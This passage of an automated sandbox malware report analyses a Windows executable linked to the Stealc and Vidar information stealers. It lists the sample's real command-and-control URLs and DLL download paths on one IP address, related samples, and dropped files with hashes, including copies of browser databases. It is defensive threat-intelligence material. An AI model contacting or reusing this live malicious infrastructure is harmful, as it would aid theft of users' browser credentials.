http://185.215.113.37/e2b1563c6670f193.phpA	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpW	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpbird	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php3	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dllE	100%	Avira URL Cloud	malware
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/e2	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpimple-storage.jsonl	100%	Avira URL Cloud	malware
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpwser	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpKKJJKJEGIECAKJJEB	100%	Avira URL Cloud	malware
http://185.215.113.37e2b1563c6670f193.phpefox	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll/~	file.exe, 00000000.00000002.1663758105.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	CBAKJKJJJECFIEBFHIEG.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll5	file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php.dll	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpq	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpp	file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phps	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dlla	file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpe	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37h	file.exe, 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpj	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1688956452.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpM	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FCGCFCAF.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpY	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpinomi	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpW	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpA	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpbird	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllE	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpimple-storage.jsonl	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	file.exe, 00000000.00000002.1663758105.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682885530.00000000296C3000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJJECFIEBFHIEG.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpwser	file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpKKJJKJEGIECAKJJEB	file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org	KECBGCGCGIEGCBFHIIEBFCAFHI.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FCGCFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37e2b1563c6670f193.phpefox	file.exe, 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519040
Start date and time:	2024-09-26 05:59:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 107
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	iubXkDP5lk.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	IWXaKkm4pm.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	7l2s6qwHg7.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAFIDGCFHIEHJJJJECAKKJDBAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKEGDAKEHJDHIDHJJDAECFBKFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBAKJKJJJECFIEBFHIEG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9976
Entropy (8bit):	5.499944288613473
Encrypted:	false
SSDEEP:	192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
MD5:	42594FD09C4DF3B174CF5D59B1CAB13A
SHA1:	1B78FEB748C36A592C468A76BB60E98187D7BE4A
SHA-256:	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
SHA-512:	E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DBAEHCGHIIIDHIECFHJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCGCFCAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHCAEGCBFHJDGCBFHDAFBAFIII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCBFBGCG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECBGCGCGIEGCBFHIIEBFCAFHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKJKKJJKJEGIECAKJJEB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
